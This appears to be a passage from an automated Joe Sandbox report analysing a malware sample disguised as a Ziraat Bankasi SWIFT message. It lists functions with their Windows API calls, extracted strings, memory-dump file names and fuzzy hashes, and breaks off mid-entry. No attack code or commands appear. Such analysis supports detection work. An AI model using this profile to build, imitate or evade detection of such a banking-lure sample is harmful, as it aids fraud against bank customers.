_strcat.LIBCMT ref: 000E6F98
_wcscpy.LIBCMT ref: 000E6FAF
WSACleanup.WSOCK32 ref: 000E6FBD
_wcscpy.LIBCMT ref: 000E6FCB

Strings

0.0.0.0, xrefs: 000E6F66

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: a9413983f4d2f32e3d4cf1ef5f38cde8d42449d6b772d4726ba28f21038f7ee0
Instruction ID: aa413eed54070d7f46b05b9b3eb6c6a7970cca0368db9b62f4f8234c4acc55b0
Opcode Fuzzy Hash: a9413983f4d2f32e3d4cf1ef5f38cde8d42449d6b772d4726ba28f21038f7ee0
Instruction Fuzzy Hash: F811D271904119BFCB24AB61FC0AEDE77ACEB50711F1000B9F106A6092EF75EE858A50

Function 000DBAD7 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000DBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 000DBAF8
_wcscmp.LIBCMT ref: 000DBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000DBB85

Strings

list, xrefs: 000DBB67
@U=u, xrefs: 000DBB85
SHELLDLL_DefView, xrefs: 000DBB04
largeicons, xrefs: 000DBB19
details, xrefs: 000DBB33
smallicons, xrefs: 000DBB4D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: 41e62fbfbc735e90b29a68d325f20a5f6bcc32a911c7ba2741046d6c95d0c6f3
Instruction ID: df80e4551dada4b6590d31cc39519e747cee15442a977c525bc1f52b4b42f7ec
Opcode Fuzzy Hash: 41e62fbfbc735e90b29a68d325f20a5f6bcc32a911c7ba2741046d6c95d0c6f3
Instruction Fuzzy Hash: A7110A77608303F9FA346730EC06DEA379CDB11334B20002BF918E55D6EFE159529564

Function 000C500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C5047

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

__gmtime64_s.LIBCMT ref: 000C50E0
__gmtime64_s.LIBCMT ref: 000C5116
__gmtime64_s.LIBCMT ref: 000C5133
__allrem.LIBCMT ref: 000C5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C51A5
__allrem.LIBCMT ref: 000C51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C51DA
__allrem.LIBCMT ref: 000C51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C520F
__invoke_watson.LIBCMT ref: 000C5280

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: f6d211afeba7989302283d49c6a19ba7cacb39922fe663c21d347b067f7062c3
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: A671D775A01F16ABD7149F78CC52F9EB3E8AF15765F14422EF814D6282EB70E9808BD0

Function 000E4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E4DF8
GetMenuItemInfoW.USER32(00161708,000000FF,00000000,00000030), ref: 000E4E59
SetMenuItemInfoW.USER32(00161708,00000004,00000000,00000030), ref: 000E4E8F
Sleep.KERNEL32(000001F4), ref: 000E4EA1
GetMenuItemCount.USER32(?), ref: 000E4EE5
GetMenuItemID.USER32(?,00000000), ref: 000E4F01
GetMenuItemID.USER32(?,-00000001), ref: 000E4F2B
GetMenuItemID.USER32(?,?), ref: 000E4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000E4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E4FEB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 14af1b0587a2ec7363bc5cde89ce24f7ec1adbd19fc1564e4faf7a0dc63a2035
Instruction ID: 541335ac994a43d9682785d8e14816ecab8e57c90ec8f835afe3d16e8eae88b1
Opcode Fuzzy Hash: 14af1b0587a2ec7363bc5cde89ce24f7ec1adbd19fc1564e4faf7a0dc63a2035
Instruction Fuzzy Hash: EC61AEB1A00289AFDF21CFA5DC88AAE7BF8FB45708F140469F441B7251E771AD55CB21

Function 00109C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00109C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00109C9B
GetWindowLongW.USER32(?,000000F0), ref: 00109CBF
_memset.LIBCMT ref: 00109CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00109CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00109D5A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 173accc78e46f83b0d1df3d9a74b9c4ea986080f0c4021c44f5363140f524101
Instruction ID: 2bcb32f5ec6255fb85e43b3adeef6a69bafe3be20c34c199d43eae4d5493e1ee
Opcode Fuzzy Hash: 173accc78e46f83b0d1df3d9a74b9c4ea986080f0c4021c44f5363140f524101
Instruction Fuzzy Hash: 2B618B75900208AFDB10DFA8CC91EEE77B8EF09714F14415AFA55A72E2D7B0AD42DB50

Function 000D94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000D94FE
SafeArrayAllocData.OLEAUT32(?), ref: 000D9549
VariantInit.OLEAUT32(?), ref: 000D955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 000D957B
VariantCopy.OLEAUT32(?,?), ref: 000D95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 000D95D2
VariantClear.OLEAUT32(?), ref: 000D95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 000D95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000D95FD
VariantClear.OLEAUT32(?), ref: 000D960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000D961A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 02e71a61a82b9c383c9e4e854901d797a7e72bbf8f6487f7de8cd5a0777430fd
Instruction ID: 7543abc2dc99b8537d33a1dbc3a4aa94702a123aee2b52c4c59f03dc5b1ca21c
Opcode Fuzzy Hash: 02e71a61a82b9c383c9e4e854901d797a7e72bbf8f6487f7de8cd5a0777430fd
Instruction Fuzzy Hash: 95413135A00219EFCB11EFA4E8449DEBFB9FF08354F108066F511A7651DB31EA96CBA1

Function 000FADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

CoInitialize.OLE32 ref: 000FADF6
CoUninitialize.OLE32 ref: 000FAE01
CoCreateInstance.OLE32(?,00000000,00000017,0012D8FC,?), ref: 000FAE61
IIDFromString.OLE32(?,?), ref: 000FAED4
VariantInit.OLEAUT32(?), ref: 000FAF6E
VariantClear.OLEAUT32(?), ref: 000FAFCF

Strings

NULL Pointer assignment, xrefs: 000FAEA6
Invalid parameter, xrefs: 000FAEED
Failed to create object, xrefs: 000FAE6C, 000FAF22

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 202d00d48e1554618ba53a5fe3c3d8d8e7c8a2ca2ed5149992712b30e199bb56
Instruction ID: 53fb7ede3e3df95153dbd2de088685504f3bf78714c9406000f1bbe5fbc68c19
Opcode Fuzzy Hash: 202d00d48e1554618ba53a5fe3c3d8d8e7c8a2ca2ed5149992712b30e199bb56
Instruction Fuzzy Hash: 17618EB1308315AFD720DF94D844BAEB7E8AF86714F104419FA899B692C770ED48DB93

Function 000BCB8D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 000BCC15

Part of subcall function 000BCCCD: GetClientRect.USER32(?,?), ref: 000BCCF6
Part of subcall function 000BCCCD: GetWindowRect.USER32(?,?), ref: 000BCD37
Part of subcall function 000BCCCD: ScreenToClient.USER32(?,?), ref: 000BCD5F

GetDC.USER32 ref: 0011D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0011D14A
SelectObject.GDI32(00000000,00000000), ref: 0011D158
SelectObject.GDI32(00000000,00000000), ref: 0011D16D
ReleaseDC.USER32(?,00000000), ref: 0011D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0011D200

Strings

U, xrefs: 0011D0D5
@U=u, xrefs: 0011D14A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: 389cb5c4cecb356aa8455e3263cb8f921e0c1e6ee3dcf9046df8d8c48d363c3e
Instruction ID: a6c3d0710b48b56bf948da7992b72c32ffe9e5b061a8d45e7258d3b0e5715e22
Opcode Fuzzy Hash: 389cb5c4cecb356aa8455e3263cb8f921e0c1e6ee3dcf9046df8d8c48d363c3e
Instruction Fuzzy Hash: 7071FE31400205EFDF299F64EC81EEA3BB1FF58310F284279ED565A2A6C7308881DF60

Function 000F8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000F8168
inet_addr.WSOCK32(?,?,?), ref: 000F81AD
gethostbyname.WSOCK32(?), ref: 000F81B9
IcmpCreateFile.IPHLPAPI ref: 000F81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000F8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000F824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 000F82C2
WSACleanup.WSOCK32 ref: 000F82C8

Strings

Ping, xrefs: 000F81EB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 9cd1b1e3709101a378ac03d26585700aec959337a4d4249e5fe3c0cd04d9ad6e
Instruction ID: d1547cbf7ba8b70081c9e1bf8a9fb76b10ee89564d85460fa1396325bf9d0c50
Opcode Fuzzy Hash: 9cd1b1e3709101a378ac03d26585700aec959337a4d4249e5fe3c0cd04d9ad6e
Instruction Fuzzy Hash: FF519F31604704AFDB609F64DC45BBEBBE4BF48310F048929FA56DB6A1DB70E941EB41

Function 0010ECD4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

Part of subcall function 000BB63C: GetCursorPos.USER32(000000FF), ref: 000BB64F
Part of subcall function 000BB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000BB66C
Part of subcall function 000BB63C: GetAsyncKeyState.USER32(00000001), ref: 000BB691
Part of subcall function 000BB63C: GetAsyncKeyState.USER32(00000002), ref: 000BB69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0010ED3C
ImageList_EndDrag.COMCTL32 ref: 0010ED42
ReleaseCapture.USER32 ref: 0010ED48
SetWindowTextW.USER32(?,00000000), ref: 0010EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0010EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0010EEDC

Strings

@GUI_DRAGFILE, xrefs: 0010EE77
@U=u, xrefs: 0010EE03
@GUI_DROPID, xrefs: 0010EE33

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: 40df0cf2101480ecc3af146f2acc2903a2cb118307645be0351f62b4d420702e
Instruction ID: fa9cce4566730d7abd79f352233fb367c909466a689517dd8f41c8bcad16f109
Opcode Fuzzy Hash: 40df0cf2101480ecc3af146f2acc2903a2cb118307645be0351f62b4d420702e
Instruction Fuzzy Hash: C451B974204304AFE710EF20DC86FAA77E4FB88704F04491DF995972E2DBB0A994CB52

Function 000EE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000EE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000EE40C
GetLastError.KERNEL32 ref: 000EE416
SetErrorMode.KERNEL32(00000000,READY), ref: 000EE483

Strings

READONLY, xrefs: 000EE44E
NOTREADY, xrefs: 000EE442
INVALID, xrefs: 000EE455
READY, xrefs: 000EE45C
UNKNOWN, xrefs: 000EE43B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f3d58f6791574022b14b08531fc822017bccf547937621bc73fa8ef24f32f339
Instruction ID: 90a76486f57f620c74224adc9ce094c4f2ba794899a725faf7cd84f3120a6888
Opcode Fuzzy Hash: f3d58f6791574022b14b08531fc822017bccf547937621bc73fa8ef24f32f339
Instruction Fuzzy Hash: FD31D275A00289AFDB11EBA9D845EEEB7F4EF09340F148026F911BB2D2D770AA02C751

Function 00108ECC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00108EE4
GetDC.USER32(00000000), ref: 00108EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00108EF7
ReleaseDC.USER32(00000000,00000000), ref: 00108F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00108F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00108F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0010BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00108F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00108FAA

Strings

@U=u, xrefs: 00108F50, 00108FAA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: 76b9e84deca4be8355d3271ca91b022ab929cc8adfe2ea3ffb1ef6b57d422b9a
Instruction ID: ee96b4e8f22398630c521ff561c49e1ad597a896d548dc0f643771cbd3e2a928
Opcode Fuzzy Hash: 76b9e84deca4be8355d3271ca91b022ab929cc8adfe2ea3ffb1ef6b57d422b9a
Instruction Fuzzy Hash: DD316D72104614BFEB208F60DC4AFEB3BAAEF49715F044065FE489A291DBB59852CB74

Function 000FB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000FB2D5
CoInitialize.OLE32(00000000), ref: 000FB302
CoUninitialize.OLE32 ref: 000FB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 000FB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 000FB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000FB56D
CoGetObject.OLE32(?,00000000,0012D91C,?), ref: 000FB590
SetErrorMode.KERNEL32(00000000), ref: 000FB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000FB623
VariantClear.OLEAUT32(0012D91C), ref: 000FB633

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6ddade1c57e04d94ed9d51f3d5f3c8dc0df2ce71c483d0896e1474319f9bf35b
Instruction ID: f4b20b463badc215aa5c041dbd6c9c3687d15d56a7a66218a59a2e959c96ed00
Opcode Fuzzy Hash: 6ddade1c57e04d94ed9d51f3d5f3c8dc0df2ce71c483d0896e1474319f9bf35b
Instruction Fuzzy Hash: D6C13271608305AFC700DF68C884A6AB7E9FF89748F00491DF68ADB252DB71ED05CB52

Function 000CACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 000CACC1

Part of subcall function 000C7CF4: __mtinitlocknum.LIBCMT ref: 000C7D06
Part of subcall function 000C7CF4: EnterCriticalSection.KERNEL32(00000000,?,000C7ADD,0000000D), ref: 000C7D1F

__calloc_crt.LIBCMT ref: 000CACD2

Part of subcall function 000C6986: __calloc_impl.LIBCMT ref: 000C6995
Part of subcall function 000C6986: Sleep.KERNEL32(00000000,000003BC,000BF507,?,0000000E), ref: 000C69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 000CACED
GetStartupInfoW.KERNEL32(?,00156E28,00000064,000C5E91,00156C70,00000014), ref: 000CAD46
__calloc_crt.LIBCMT ref: 000CAD91
GetFileType.KERNEL32(00000001), ref: 000CADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000CAE11

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 82e533d66c8c930cfb1724faf3f304dfd3434f993c34a6b3da3dc81edd6f08a6
Instruction ID: d28c2c250ce650607ff2e191bc5b78db22754da7d92abccbf464bcc585929a8e
Opcode Fuzzy Hash: 82e533d66c8c930cfb1724faf3f304dfd3434f993c34a6b3da3dc81edd6f08a6
Instruction Fuzzy Hash: C0810B70A053598FDB24CF68DC44A9DBBF0BF0A328B24426DD4A6AB3D1C7349843CB95

Function 000E67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000E67FD
__swprintf.LIBCMT ref: 000E680A

